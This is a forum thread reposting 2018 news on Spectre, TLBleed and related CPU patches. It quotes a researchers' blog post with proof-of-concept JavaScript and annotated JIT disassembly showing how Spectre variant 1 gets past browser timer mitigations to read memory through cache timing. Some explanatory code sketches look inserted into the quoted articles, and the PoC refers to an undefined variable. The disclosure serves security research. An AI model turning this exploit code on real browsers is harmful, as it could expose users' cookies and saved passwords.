CPU Vulnerabilities, Meltdown and Spectre, Kernel Page Table Isolation Patches, and more

Discussion in 'Hardware Components and Aftermarket Upgrades' started by hmscott, Jan 2, 2018.

  1. hmscott

    hmscott Notebook Nobel Laureate

    Reputations:
    4,650
    Messages:
    16,175
    Likes Received:
    19,884
    Trophy Points:
    931
    OpenBSD disables Intel’s hyper-threading over CPU data leak fears
    Cites risk of different security domains on one core as others hint at another bug drop

    By Simon Sharwood, APAC Editor 20 Jun 2018 at 07:32
    https://www.theregister.co.uk/2018/06/20/openbsd_disables_intels_hyperthreading/

    "OpenBSD has disabled Intel’s hyper-threading technology, citing security concerns – seemingly, Spectre-style concerns.

    As detailed in this mailing list post, OpenBSD maintainer Mark Kettenis wrote that “SMT (Simultaneous Multi Threading) implementations typically share TLBs and L1 caches between threads.

    “This can make cache timing attacks a lot easier and we strongly suspect that this will make several Spectre-class bugs exploitable.”

    So OpenBSD has decided to disable Intel CPU hyper-threading, with “a new hw.smt sysctl,” in order to avoid data potentially leaking from applications to other software via Spectre-like processor flaws.

    “For now this only works on Intel CPUs when running OpenBSD/amd64,” Kettenis wrote. “But we're planning to extend this feature to CPUs from other vendors and other hardware architectures.”

    Insane in the domain
    There’s not much more by way of explanation for the decision in Kettenis’ post, other than the observation that: “We really should not run different security domains on different processor threads of the same core.”

    There is, however, a further hint about the reason in this post from OpenBSD chap Philip Guenther, who committed a change to “clear the GPRs when entering the kernel from userspace so that user-controlled values can't take part in speculative execution in the kernel down paths that end up 'not taken' but that may cause user-visible effects (cache, etc).”

    That commit was accompanied by a request to disable Intel hyper-threading.

    We've also spotted this Seclists message mentioning OpenBSD's decision, and hinting that a related disclosure is coming on June 27. And this talk at Black Hat in August promises to reveal how miscreants can extract encryption keys from application memory via hyper-threading and TLB data leaks.

    Specifically, that presentation, by Ben Gras, will cover a technique dubbed TLBleed that exploits hyper-threading to swipe sensitive data:

    Our TLBleed exploit successfully leaks a 256-bit EdDSA key from libgcrypt (used in e.g. GPG) with a 98% success rate after just a single observation of a signing operation on a co-resident hyper-thread and just 17 seconds of analysis time.

    We’ve asked Kettenis to offer more information, and Intel to comment, but neither had been in touch at the time of writing.

    Performance
    Kettenis’ post suggests disabling hyper-threading won’t be a big deal because “SMT doesn't necessarily have a positive effect on performance; it highly depends on the workload. In all likelihood it will actually slow down most workloads if you have a CPU with more than two cores.”

    He’s not wrong: unless code is written with hyper-threading in mind, the performance benefit isn’t enormous, and not a lot of code specifically takes advantage of the feature. Hyper-threading works by allowing one CPU core to run multiple threads at once, as opposed to one thread per core.

    Intel, however, markets hyper-threading as a distinct virtue: its CPU spec sheets always mention core and thread count.

    Hints of further Spectre-like security worries will therefore be most unwelcome to Chipzilla. The OpenBSD community was miffed by the steps taken to disclose Meltdown and Spectre design flaws – effectively freezing out a chunk of the BSD world from private collaborations on mitigations – and called for such revelations to be handled differently in future."

     
  2. hmscott

    hmscott Notebook Nobel Laureate

    Reputations:
    4,650
    Messages:
    16,175
    Likes Received:
    19,884
    Trophy Points:
    931
    Oracle gets busy with Lazy FPU fix, adds more CPU Spectre-protectors
    Oracle Linux and VM get their inoculations

    By Richard Chirgwin 26 Jun 2018 at 04:58
    https://www.theregister.co.uk/2018/06/26/oracle_patches_lazy_fpu_and_spectre/

    "Oracle has released fixes for Spectre v3a, Spectre v4, and the “Lazy FPU” vulnerability.

    The two Spectre patches cover CVE-2018-3640 (v3a) and CVE-2018-3639 (v4).

    As Oracle's director of security assurance Eric Maurice explained, the patches apply to both Oracle Linux and Oracle VM and the associated Intel microcode.

    The company was also busy on Friday with fixes for admins with systems that use its Ksplice no-reboot patches.

    The one everyone was waiting for patches Oracle Linux RHCK 7 against the Intel Lazy FPU issue, CVE-2018-3665. Oracle Linux 6 and Oracle Linux 7 got their Lazy FPU patches in a separate announcement.

    There's also a patch for Oracle Linux 6 and 7, to fix an IPSec denial-of-service, CVE-2017-16939.

    The company's also announced improved fixes for the Spectre v2 mitigations (Intel and AMD), again for Oracle Linux 6 and 7."

     
  3. Papusan

    Papusan JOKEBOOKS = That sucks!! STAHP! Dont buy FILTH...

    Reputations:
    12,383
    Messages:
    18,517
    Likes Received:
    27,883
    Trophy Points:
    931
    Intel Releases "Spectre" Hardening Microcode Updates for "Ivy Bridge" thru "Westmere" Architectures
    Today, 10:49
    Intel today released the latest round of CPU micro-code updates for its processors, which expand support for Intel processor microarchitectures ranging all the way back to 1st generation Core "Westmere," and "Lynnfield," and including "Sandy Bridge" and "Ivy Bridge" along the way, at various stages of roll-out (beta, pre-production, and production). This update probably features hardening against "Spectre" variant 4, and perhaps even RSRR (rogue system register read) variant 3A, chronicled in CVE-2018-3640.

    https://www.intel.com/content/dam/www/public/us/en/documents/sa00115-microcode-update-guidance.pdf
     
    Last edited: Jul 2, 2018
    Robbo99999, hmscott and Vasudev like this.
  4. hmscott

    hmscott Notebook Nobel Laureate

    Reputations:
    4,650
    Messages:
    16,175
    Likes Received:
    19,884
    Trophy Points:
    931
    Researchers find a new side-channel attack against a performance-enhancing feature in Intel CPUs - Intel won't fix it.
    By Liam Tung | June 26, 2018 -- 12:39 GMT (05:39 PDT)
    https://www.zdnet.com/article/tlble...aw-to-surface-but-dont-expect-it-to-be-fixed/

    "Intel won't be patching a newly revealed side-channel vulnerability in its CPUs, even though it could be used to leak encryption keys for signing a message.

    The flaw, which will be presented at the Black Hat USA 2018 conference, is why OpenBSD recently decided to disable hyperthreading on Intel CPUs.

    The OpenBSD project's chief, Theo de Raadt, said he dropped support for the feature after viewing the paper from researchers at the Systems and Network Security Group at Vrije Universiteit Amsterdam.

    The Register reported on Friday that the paper details an attack on Intel's Hyper-Threading technology to reliably extract a 256-bit EdDSA encryption key used for cryptographically signing data.

    The researchers argue that their attack, dubbed TLBleed, is able to leak the keys from another program in no less than 98 percent of tests, depending on the Intel CPU architecture. The leak happens when the key is being used to sign data.

    As the attack relies on Intel's Hyper-Threading, this side-channel flaw differs from Spectre and Meltdown, which exploit speculative execution. Intel's Hyper-Threading technology is available on Intel Core, Core vPro, Core M, and Xeon processors.

    In a publicly available summary, the researchers note that the side-channel attack leaks information from the Translation Lookaside Buffer (TLB), a special type of memory cache that stores recent translations that map virtual to physical memory addresses.

    If Hyper-Threading is enabled, a single core can execute multiple threads simultaneously for performance gains, but that core also shares the same memory caches and TLB.

    The attack makes it possible for one thread to see how another accesses the CPU through the TLB, and to use this information to work out secrets from another program stored in shared RAM.
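
    The shared-TLB contention described above can be sketched as a toy model. This is a hypothetical JavaScript simulation (the set count, page numbers, and function names are all invented for illustration), not Intel's actual TLB design: two hyper-threads index one direct-mapped translation cache, so each thread's lookups evict the other's entries, and that eviction pattern is what a co-resident attacker can observe through timing.

```javascript
// Toy model of a shared, direct-mapped TLB. Two hyper-threads index the
// same entry array, so one thread's lookups evict the other's entries --
// the basis of the TLBleed observation above. All sizes are invented.
const TLB_SETS = 16;

function makeTlb() { return new Array(TLB_SETS).fill(null); }

function translate(tlb, virtPage, threadId, stats) {
  const set = virtPage % TLB_SETS;      // which TLB set this page maps to
  const e = tlb[set];
  if (e && e.virtPage === virtPage) {
    stats.hits++;                       // fast path: cached translation
  } else {
    stats.misses++;                     // slow path: page-table walk
    tlb[set] = { virtPage, threadId };
  }
}

// Thread A touches page 5 repeatedly; thread B touches page 21 (5 + 16),
// which maps to the same set, so each access evicts the other's entry.
const tlb = makeTlb();
const statsA = { hits: 0, misses: 0 }, statsB = { hits: 0, misses: 0 };
for (let i = 0; i < 10; i++) {
  translate(tlb, 5, 'A', statsA);
  translate(tlb, 21, 'B', statsB);
}
// Every access misses: statsA.misses === 10, statsB.misses === 10
```

    In the real attack the attacker thread times its own TLB misses to infer which pages the victim thread touched; here the miss counters stand in for those timings.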

    "Our TLBleed exploit successfully leaks a 256-bit EdDSA key from cryptographic signing code, which would be safe from cache attacks with cache isolation turned on, but would no longer be safe with TLBleed. We achieve a 98 percent success rate after just a single observation of signing operation on a co-resident hyperthread and just 17 seconds of analysis time."

    The researchers say their attack is able to extract this key while a program is signing a message with the libgcrypt cryptographic library.

    However, to exploit the flaw, an attacker would already need to have malware running on a target system or be logged in. But the vulnerability could pose a threat to virtual machines on a public cloud, which could be exploited from another instance on the same machine.

    Intel appears unlikely to patch the bug and did not award the researchers payment under its side-channel bug bounty. The company has said its cache attack protections are sufficient to block TLBleed attacks.

    However, Ben Gras, one of the researchers behind TLBleed, said in a tweet that the attack shows that cache side-channel protections, such as cache isolation, are not enough.

    Intel told ZDNet that it had been made aware of the Vrije Universiteit research and TLBleed, which it stressed is unrelated to Spectre or Meltdown.

    "Research on side-channel analysis methods often focuses on manipulating and measuring the characteristics (eg, timing) of shared hardware resources. These measurements can potentially allow researchers to extract information about the software and related data," Intel said in a statement.

    "Software or software libraries such as Intel Integrated Performance Primitives Cryptography version U3.1, written to ensure constant execution time and data independent cache traces, should be immune to TLBleed."
    PREVIOUS AND RELATED COVERAGE
    Another day, another Intel CPU security hole: Lazy State

    Intel has announced that there's yet another CPU security bug in its Core-based microprocessors.

    Meltdown-Spectre: Oracle's critical patch update offers fixes against CPU attacks

    The enterprise software giant is working on Spectre fixes for Solaris on Sparc V9.

    New Spectre variant 4: Our patches cause up to 8% performance hit, warns Intel

    Intel's Spectre variant 4 patch will be off by default, but users who turn it on are likely to see slower performance.

    Spectre chip security vulnerability strikes again; patches incoming

    A Google developer discovered a new way that a 'Spectre'-style check can be used to attack any computer running any operating system.

    Are 8 new 'Spectre-class' flaws in Intel CPUs about to be exposed?

    Reports are emerging of eight new 'Spectre-class' security CPU vulnerabilities.

    Ex-Intel security expert: This new Spectre attack can even reveal firmware secrets

    A new variant of Spectre can expose the contents of memory that normally can't be accessed by the OS kernel.

    Microsoft to Windows users: Here are new critical Intel security updates for Spectre v2

    Microsoft releases new Windows updates to address the Spectre variant 2 flaw affecting Intel chips.

    Windows 10 on AMD? This new update plus Microsoft's patch block Spectre attacks

    AMD has released microcode updates for Spectre variant 2 that require Microsoft's latest Windows 10 patch.

    Intel: We now won't ever patch Spectre variant 2 flaw in these chips

    A handful of CPU families that Intel was due to patch will now forever remain vulnerable.

    Windows 7 Meltdown patch opens worse vulnerability: Install March updates now

    Microsoft's Meltdown fix opened a gaping hole in Windows 7 security, warns researcher.

    Intel's new Spectre fix: Skylake, Kaby Lake, Coffee Lake chips get stable microcode

    Intel makes progress on reissuing stable microcode updates against the Spectre attack.

    Got an old PC? Find out whether you will get Intel's latest Spectre patch (TechRepublic)

    Intel has listed a range of CPUs released between 2007 and 2011 that will not receive a firmware update to help guard against Spectre-related exploits.

    Class-action suits over Intel Spectre, Meltdown flaws surge (CNET)

    Since the beginning of 2018, the number of cases has risen from three to 32.
     
    Last edited: Jul 2, 2018
    Vasudev likes this.
  5. hmscott

    hmscott Notebook Nobel Laureate

    Reputations:
    4,650
    Messages:
    16,175
    Likes Received:
    19,884
    Trophy Points:
    931
    Rowhammer returns, Spectre fix unfixed, Wireguard makes a new friend, and much more
    And NSA can't stop slurping your phone records
    By Shaun Nichols in San Francisco 30 Jun 2018 at 07:01
    https://www.theregister.co.uk/2018/06/30/security_roundup/

    "...
    Spectre patches may need a patch
    When is a fix not a fix? When it's an attempt to patch up the Spectre vulnerability, apparently.

    Researchers Noam Hadad and Jonathan Afek of Aleph Security said this week that they had devised a way to work around some of the measures browser vendors have used to mitigate the vulnerability.

    It turns out the data-timing tricks browsers use to help prevent exploits can be overcome, provided the attackers don't mind a little performance hit.

    "In our research we were able to overcome the cache access timing specific mitigations. Although these mitigations cause a serious slowdown in our POC, they are not effective in preventing this attack," the duo write.

    "These mitigations also have some negative performance implications and are hurting the functionality of some legitimate JavaScript web application use-cases."

    Overcoming (some) Spectre browser mitigations

    By Noam Hadad & Jonathan Afek (@JonathanAfek)
    June 26, 2018
    https://alephsecurity.com/2018/06/26/spectre-browser-query-cache/
    Spectre is a CPU vulnerability which allows an attacker in certain scenarios to read “secret” data on the victim’s machine. The vulnerability was first published by Google Project Zero and by various researchers.

    One of the variants of Spectre (variant 1) is relevant in browsers executing malicious Javascript code in JIT engines. When a victim visits an attacker controlled website and malicious Javascript is served on the site, it can potentially read all the mapped memory space of the browser process. To exploit this vulnerability the attacker code has to access “secret” memory in speculatively executed Javascript JIT code that would have been otherwise inaccessible as it contains secret data. In a simple Javascript Spectre exploit this would be out-of-bounds index access of a Javascript array. Still, in the speculative branch, some memory (Javascript variable) has to be accessed and therefore be inserted into the CPU cache based on the “secret” value - different “secret” values will cause different variables to be inserted into the CPU cache. Then, outside the speculative branch we measure the access time to the different Javascript variables to query whether they are CPU cached or not. If we can understand which of them was in the CPU cache, we can conclude what the “secret” value was. In a browser environment, the “secret” values in the same process memory can be HttpOnly cookies, cookies of other origins, saved passwords or any other browser “secret” data or per-domain “secret” data.

    Because of this vulnerability discovery, browser vendors implemented different mitigations for this vulnerability. Some of them are meant to disable known methods for querying CPU cache state of memory slots (Javascript variables). These mitigations include the resolution reduction of the Javascript timer performance.now() and adding jitter to its results.

    In our research we were able to overcome the cache access timing specific mitigations. Although these mitigations cause a serious slowdown in our POC, they are not effective in preventing this attack. These mitigations also have some negative performance implications and are hurting the functionality of some legitimate Javascript web application use-cases.

    In this blog post we will first briefly talk about CPU caches in general and how they work. Then, we will briefly discuss browser Javascript JIT engines with focus on V8 and Chrome/Chromium. Next, we will show how to implement the original exploit before any Spectre specific mitigations. After that, we will introduce the known implemented Spectre mitigations in the different browsers. Next, we will show how we beat the timing specific mitigations step by step. Lastly, we will examine the implications of this research and possible further research to be done.

    Here is the POC code.

    CPU Cache
    In this section we will focus only on the LLC L3 CPU cache for simplicity. This is good enough for understanding the concepts of the POC presented in this blog post. The major timing difference we expect to see in memory access time is between RAM fetches and CPU-cached memory (any level of cache). Any memory that is CPU-cached in any level of cache is expected to also reside in the L3 LLC cache. We assume 64-bit browser processes with 48-bit addresses. We assume that the CPU uses 4KB pages and that each virtual memory address is inside a virtual memory page which is mapped to a physical memory page. This means that the lower 12 bits of the virtual address of each memory address are the same as the lower 12 bits of the physical address of that referenced memory. We assume that the CPU cache is split into X different cache sets and that each of them holds an LRU list of Y cache-lines, each of size 64 bytes (512 bits). This means the lower 6 bits of each memory address are the offset inside the cache-line of the address.

    Physical address: [b18-b47: TAG, b6-b17: Cache set index, b0-b5: Cache line offset]
                                            |
          +-----------------+-----------------+--------------...
          |                 |                 |
    - Cache set 0 -   - Cache set 1 -   - Cache set 2 -
    ----- LRU -----   ----- LRU -----   ----- LRU -----
    |Cache line 0 |   |Cache line 0 |   |Cache line 0 |
    | TAG : DATA  |   | TAG : DATA  |   | TAG : DATA  |
    ---------------   ---------------   ---------------
    |Cache line 1 |   |Cache line 1 |   |Cache line 1 |
    | TAG : DATA  |   | TAG : DATA  |   | TAG : DATA  |
    ---------------   ---------------   ---------------
    |Cache line 2 |   |Cache line 2 |   |Cache line 2 |
    | TAG : DATA  |   | TAG : DATA  |   | TAG : DATA  |
    ---------------   ---------------   ---------------
          .                 .                 .
          .                 .                 .

    In the above graph you can see that for each physical address, the middle bits (6-17) determine the cache set the address belongs to. Whenever data at a certain address is accessed, the CPU needs to first determine whether the data is in the CPU cache or not. In order to do that the address is examined. By examining the cache set index bits (6-17, in our example) the relevant cache set is determined. Each combination of cache set index bits is mapped exclusively to a specific cache set. Each cache set is an LRU list of cache lines each holding a TAG and 512 bits of data. The TAG bits of the given address are then compared against all the TAGs currently in the cache set. If there is a match then the data in the cache line is returned to the CPU and the cache line is marked as the most recently used in the set. If there is no match then the least recently used cache line is removed from the set and the data is fetched from the RAM into a new cache line in the set and to the CPU.
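
    The lookup procedure just described can be sketched in a few lines of JavaScript. This is a toy model, not real hardware: the 4-way associativity and all names are assumed for illustration.

```javascript
// Toy model of one cache set: compare the address TAG against every line
// in the set; on a hit, promote the line to most-recently-used; on a miss,
// evict the least-recently-used line and fetch from RAM. 4 ways assumed.
const WAYS = 4;

function makeSet() { return []; }   // index 0 = most recently used

function access(cacheSet, tag) {
  const i = cacheSet.findIndex(line => line.tag === tag);
  if (i >= 0) {
    const [line] = cacheSet.splice(i, 1);   // hit: promote to MRU
    cacheSet.unshift(line);
    return 'hit';
  }
  if (cacheSet.length === WAYS) cacheSet.pop(); // evict the LRU line
  cacheSet.unshift({ tag });                    // fetch from RAM into the set
  return 'miss';
}

const s = makeSet();
['A', 'B', 'C', 'D'].forEach(t => access(s, t)); // fill all 4 ways
const r1 = access(s, 'A');   // 'hit'  -- A promoted to MRU
const r2 = access(s, 'E');   // 'miss' -- evicts B (now least recently used)
const r3 = access(s, 'B');   // 'miss' -- B was just evicted
```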

    The above bit ranges in the address are assumed in the POC, and we will refer to them again later in the post, but the technique works just as well with different bit ranges used for the different roles. What we do rely on is that bits 10 and 11 are part of the cache set index bits.
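
    Under the bit ranges assumed above (6 offset bits, 12 set-index bits, the rest tag), splitting an address into its three fields is mechanical. A short sketch, using BigInt because the tag bits extend past JavaScript's 32-bit bitwise operators; the function name and sample addresses are invented:

```javascript
// Decompose a 48-bit physical address (as BigInt) into the three fields
// from the diagram above: b0-b5 line offset, b6-b17 set index, b18-b47 tag.
function decompose(addr) {
  const offset = addr & 0x3Fn;          // b0-b5: byte offset within 64-byte line
  const set    = (addr >> 6n) & 0xFFFn; // b6-b17: selects one of 4096 sets
  const tag    = addr >> 18n;           // b18-b47: compared against stored TAGs
  return { offset, set, tag };
}

// Two addresses that differ only in bits 0-5 land in the same set, with the
// same tag, so they share a cache line:
const a = decompose(0x7f1234567840n);
const b = decompose(0x7f123456787Fn);
// a.set === b.set and a.tag === b.tag; only the offsets differ
```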

    For more information on how CPU caches work please refer to this presentation and to Wikipedia.

    Javascript engines and V8
    Before getting to exploiting Spectre in a browser environment we first need to understand how Javascript engines and JIT engines work. For our research we examined V8 specifically which is Chrome’s open source Javascript engine.

    V8 first compiles each Javascript function it encounters into bytecode and executes the bytecode with an interpreter. Each time the function executes, the types of its parameters are recorded into the function’s feedback vector. After the function has executed many times, the TurboFan JIT compiler kicks in and compiles the function into CPU-specific assembly code optimized for the input parameter types recorded in the feedback vector. The compiled function first checks that the input types are indeed the types that were recorded in the feedback vector. If not, execution falls back to bytecode; if there is a match, the function continues. Each Javascript object representation holds, as its first member, a pointer to the Hidden Class of the specific object type, which defines the object’s layout. The type comparison is done by comparing this pointer to a known value for the classes recorded in the feedback vector.

    Let’s take the following Javascript code for example (from the original Spectre paper):

    if (index < simpleByteArray.length) {
        index = simpleByteArray[index | 0];
        index = (((index * TABLE1_STRIDE)|0) & (TABLE1_BYTES-1))|0;
        localJunk ^= probeTable[index|0]|0;
    }

    Which was compiled with TurboFan to:

    1 cmpl r15,[rbp-0xe0] ;Compare index (r15) against simpleByteArray.length
    2 jnc 0x24dd099bb870 ;If index >= length, branch to instruction after movq below
    3 REX.W leaq rsi,[r12+rdx*1] ;Set rsi=r12+rdx=addr of first byte in simpleByteArray
    4 movzxbl rsi,[rsi+r15*1] ;Read byte from address rsi+r15 (= base address+index)
    5 shll rsi,12 ;Multiply rsi by 4096 by shifting left 12 bits
    6 andl rsi,0x1ffffff ;AND reassures JIT that next operation is in-bounds
    7 movzxbl rsi,[rsi+r8*1] ;Read from probeTable
    8 xorl rsi,rdi ;XOR the read result onto localJunk
    9 REX.W movq rdi,rsi ;Copy localJunk into rdi

    In this case, for a successful attack, [rbp-0xe0] - (simpleByteArray.length) should be not in the CPU cache so that the condition of the conditional jump at line 2 could not be determined right away and the CPU would have to guess the result (speculative execution). The attack code was designed to execute the code above in a function and execute the function many times with an index which is in-bounds of the array. That way, when the code passes a large out-of-bounds index, the speculative execution guesses it is actually in-bounds. At line 4, the code reads an out-of-bounds value from simpleByteArray[index] into an index inside the speculatively falsely executed branch, and then in that same branch it reads from probeTable[index]. After a while the CPU fetches simpleByteArray.length from RAM, understands it falsely executed the branch because index is out-of-bounds and doesn’t commit any of the operations performed in the branch. One effect of the branch execution that the CPU can’t reverse is the CPU cache state. If probeTable was completely out of the CPU cache beforehand, after executing this function only the slot probeTable[index] should be in the CPU cache. Using the code below, we can query the cache state of all the probeTable slots and understand which one of them was cached and therefore conclude what index was inside the speculatively executed branch which is an out-of-bounds memory location from simpleByteArray.

    for (var i = 0; i < PROBE_TABLE_SIZE; i += TABLE1_STRIDE) {
        var before = performance.now();
        tmp += probeTable[i]; // add to a global var
        var after = performance.now();
        if (after - before < CACHE_HIT_THRESHOLD) {
            return i; // This is the index from the speculative execution before
        }
    }

    Using different out-of-bounds indices iteratively, the whole browser process memory could be read and the attacker could get sensitive information saved in that process, such as cookies for other domains, saved passwords and any other user data saved in the process memory.

    It should be noted that other techniques for timing the probeTable access existed before browsers implemented the Spectre mitigations, some of them more accurate than using performance.now(). Here is a good overview of such techniques.

    For a full implementation of the Javascript Spectre attack for unpatched browsers please see here.

    Spectre browser mitigations
    All the major browser vendors implemented Spectre mitigations to prevent this attack.

    V8 mitigations relevant for Chrome and Chromium.

    Chrome mitigations relevant for Chrome.

    Chromium mitigations relevant for Chromium.

    Firefox mitigations relevant for Firefox.

    Microsoft mitigations relevant for Internet Explorer and Microsoft Edge.

    Webkit mitigations relevant for Safari.

    The main relevant mitigations are:
    1. Index masking of array objects data access. This means that before using the supplied index to access an array-like object, the index is AND’d with a mask that is based on the length of the array. The CPU does not guess the output of AND operations before it has both sides, so no speculation could be done on the mask and all reads should be in-bounds with this mitigation. We should note that the mask is for the next power of 2 above the array length in most implementations, so small out-of-bounds access might still be possible, albeit very challenging. If the mask is already retrieved from RAM then most probably the array length is already in the CPU cache, as they are usually very close (could be on the same cache-line). In addition, the RAM fetch request for the length was probably initiated first, so it would probably complete first and the speculative execution would terminate before the actual array access.

    2. Site-Isolation for resources per domain in separate processes. That means that Javascript code running in the context of domain X will not have the cookies of domain Y in the same memory space.

    3. Disabling support for SharedArrayBuffer that can be used to implement high precision timers to time data access and query whether it was CPU cached or not.

    4. Reducing resolution of response of performance.now(), so that it would be hard to use it for timing data access given the very fast CPU cache and/or RAM access times.

    5. Adding jitter to the response of performance.now() so it would be even harder to time data access. It should be noted that where implemented, it still needs to keep the following properties: if t1 > t2 then performance.now()[t1] >= performance.now()[t2], and also if the current time is exactly t1 then |performance.now()[t1] - t1| <= fixed-small-max-jitter-value.
    The exact performance.now() implementation for Chromium, including the lower resolution and jitter, can be seen here, through the functions “Performance::now()”, “Performance::MonotonicTimeToDOMHighResTimeStamp()” and “TimeClamper::ClampTimeResolution()”.
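
    Mitigations 4 and 5 together can be sketched as follows. This is a minimal illustration of the clamping idea, not Chromium's actual TimeClamper code; the resolution value and the jitter function are assumed:

```javascript
// Sketch of timer coarsening: round the real timestamp down to a coarse
// resolution bucket, then add a deterministic per-bucket jitter smaller
// than the resolution. Repeated reads within one bucket return the same
// value, and the monotonicity property from point 5 is preserved.
const RESOLUTION_US = 100; // hypothetical clamp resolution, in microseconds

function clampedNow(realTimeUs) {
  const bucket = Math.floor(realTimeUs / RESOLUTION_US);
  // Deterministic pseudo-random jitter in [0, RESOLUTION_US), keyed on the
  // bucket, via a Knuth-style multiplicative hash.
  const jitter = (Math.imul(bucket, 2654435761) >>> 0) % RESOLUTION_US;
  return bucket * RESOLUTION_US + jitter;
}

// Because jitter < RESOLUTION_US, clamped times never decrease as real
// time increases, and the error stays within the resolution.
let prev = -Infinity;
for (let t = 0; t < 10000; t += 7) {
  const c = clampedNow(t);
  if (c < prev) throw new Error('not monotonic');
  prev = c;
}
```

    With a 100-microsecond bucket, the few-hundred-nanosecond gap between a cache hit and a RAM fetch vanishes inside a single bucket, which is exactly what the researchers had to work around.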

    Overcoming the index masking mitigation
    This mitigation prevents us from accessing out-of-bounds data from speculative execution branches using out-of-bounds indices for array-like objects.

    Let’s consider another approach with the following Javascript code:

    var probeBuf = new ArrayBuffer(256);
    var probeArr = new Uint8Array(probeBuf);

    function spectre(obj) {
        var index = obj.m53 % 256;
        probeArr[index] = 100;
    }

    function LargeClass() {
        this.m1 = 1;
        this.m2 = 1;
        this.m3 = 1;
        this.m4 = 1;
        this.m5 = 1;
        this.m6 = 1;
        this.m7 = 1;
        this.m8 = 1;
        this.m9 = 1;
        this.m10 = 1;
        this.m11 = 1;
        this.m12 = 1;
        this.m13 = 1;
        this.m14 = 1;
        this.m15 = 1;
        this.m16 = 1;
        this.m17 = 1;
        this.m18 = 1;
        this.m19 = 1;
        this.m20 = 1;
        this.m21 = 1;
        this.m22 = 1;
        this.m23 = 1;
        this.m24 = 1;
        this.m25 = 1;
        this.m26 = 1;
        this.m27 = 1;
        this.m28 = 1;
        this.m29 = 1;
        this.m30 = 1;
        this.m31 = 1;
        this.m32 = 1;
        this.m33 = 1;
        this.m34 = 1;
        this.m35 = 1;
        this.m36 = 1;
        this.m37 = 1;
        this.m38 = 1;
        this.m39 = 1;
        this.m40 = 1;
        this.m41 = 1;
        this.m42 = 1;
        this.m43 = 1;
        this.m44 = 1;
        this.m45 = 1;
        this.m46 = 1;
        this.m47 = 1;
        this.m48 = 1;
        this.m49 = 1;
        this.m50 = 1;
        this.m51 = 1;
        this.m52 = 1;
        this.m53 = 1;
    }

    function SmallClass() {
        this.m1 = 1;
        this.m2 = 1;
        this.m3 = 1;
        this.m4 = 1;
        this.m53 = 1;
    }

    var largeObj = new LargeClass();
    var smallObj = new SmallClass();

    for (var i = 0; i < 4000000; i++) {
        spectre(largeObj);
    }

    spectre(smallObj); // Will speculatively treat the object as LargeClass at first

    for (var i = 0; i < 256; i++) {
        var before = performance.now();
        probeArr[i] = 100;
        var after = performance.now();
        if (after - before < 200) {
            // None of the probeArr slots are in the cache from before, since it was never accessed in this code.
            // The first slot that is detected to be in the CPU cache, because of the fast access time, is
            // then used to determine the value of the byte at offset 0x1bb from the beginning of the input object of the spectre() function.
            // The slot is referenced inside the function spectre() in a speculatively executed branch, and by the fast
            // access time we can conclude which slot is in the CPU cache and therefore the "secret" data that was used to
            // set the slot index inside the function spectre().
            // The value of the memory at offset 0x1bb from the beginning of the input object to the spectre() function is the current value of i.
            // Log the result and exit the loop.
            break;
        }
    }
    console.log(localJunk);

    TurboFan compiles the function spectre() into:
    ...

    //fetch input param (obj) of the function to rax
    0x2b40db1d21ea 6a 488b4510 REX.W movq rax,[rbp+0x10]

    //make sure that param is a pointer (lower bit is 1 in V8 representation)
    0x2b40db1d21ee 6e a801 test al,0x1
    0x2b40db1d21f0 70 0f8412010000 jz 0x2b40db1d2308 <+0x188>

    //validate that the param is of type LargeClass (hidden class pointer compare)
    0x2b40db1d21f6 76 48bbf1e5d8e86b000000 REX.W movq rbx,0x6be8d8e5f1 ;; object: 0x006be8d8e5f1 <Map(HOLEY_ELEMENTS)>
    0x2b40db1d2200 80 483958ff REX.W cmpq [rax-0x1],rbx
    0x2b40db1d2204 84 0f8503010000 jnz 0x2b40db1d230d <+0x18d> <--speculative execution here - make sure hidden class pointer is not in cache so branch speculation will continue as if it is a LargeClass object

    //fetch member at offset 0x1bb from the beginning of the input object into rbx (this is the offset of m53 for LargeClass objects)
    0x2b40db1d220a 8a 8b98bb010000 movl rbx,[rax+0x1bb] <--access out-of-bounds data here if obj is of type SmallClass, need to make sure offset 0x1bb from the input object is in the CPU cache, so we can continue with the result before the hidden class pointer is fetched from RAM and speculative execution is stopped

    //sanity make sure that rbx (obj.m53) is indeed a 32 bit unsigned integer
    0x2b40db1d2210 90 49ba0000000001000000 REX.W movq r10,0x100000000
    0x2b40db1d221a 9a 4c3bd3 REX.W cmpq r10,rbx
    0x2b40db1d221d 9d 7310 jnc 0x2b40db1d222f <+0xaf>
    0x2b40db1d221f 9f 48ba0000000001000000 REX.W movq rdx,0x100000000
    0x2b40db1d2229 a9 e8329ae8ff call 0x2b40db05bc60 (Abort) ;; code: Builtin::Abort
    0x2b40db1d222e ae cc int3l

    //make sure rbx (obj.m53) >= 0
    0x2b40db1d222f af 83fb00 cmpl rbx,0x0
    0x2b40db1d2232 b2 0f8c9d000000 jl 0x2b40db1d22d5 <+0x155>

    //extract only the lower byte of obj.m53 (% 256)
    0x2b40db1d2238 b8 0fb6db movzxbl rbx,rbx

    //sanity make sure that rbx (obj.m53 % 256) is indeed a 32 bit unsigned integer
    0x2b40db1d223b bb 49ba0000000001000000 REX.W movq r10,0x100000000
    0x2b40db1d2245 c5 4c3bd3 REX.W cmpq r10,rbx
    0x2b40db1d2248 c8 7310 jnc 0x2b40db1d225a <+0xda>
    0x2b40db1d224a ca 48ba0000000001000000 REX.W movq rdx,0x100000000
    0x2b40db1d2254 d4 e8079ae8ff call 0x2b40db05bc60 (Abort) ;; code: Builtin::Abort
    0x2b40db1d2259 d9 cc int3l

    //make sure rbx (obj.m53 % 256) is lower than 256 as it will be used as an index for an array of that size
    0x2b40db1d225a da 81fb00010000 cmpl rbx,0x100
    0x2b40db1d2260 e0 0f83ac000000 jnc 0x2b40db1d2312 <+0x192>

    ...

    //move (obj.m53 % 256) to rax
    0x2b40db1d227a fa 8bc3 movl rax,rbx

    //sanity make sure that rax (obj.m53 % 256) is indeed a 32 bit unsigned integer
    0x2b40db1d227c fc 49ba0000000001000000 REX.W movq r10,0x100000000
    0x2b40db1d2286 106 4c3bd0 REX.W cmpq r10,rax
    0x2b40db1d2289 109 7310 jnc 0x2b40db1d229b <+0x11b>
    0x2b40db1d228b 10b 48ba0000000001000000 REX.W movq rdx,0x100000000
    0x2b40db1d2295 115 e8c699e8ff call 0x2b40db05bc60 (Abort) ;; code: Builtin::Abort
    0x2b40db1d229a 11a cc int3l

    //move the probeArr object pointer to rbx
    0x2b40db1d229b 11b 48bb700f05aa54560000 REX.W movq rbx,0x5654aa050f70

    //assign 100 to probeArr[obj.m53 % 256]
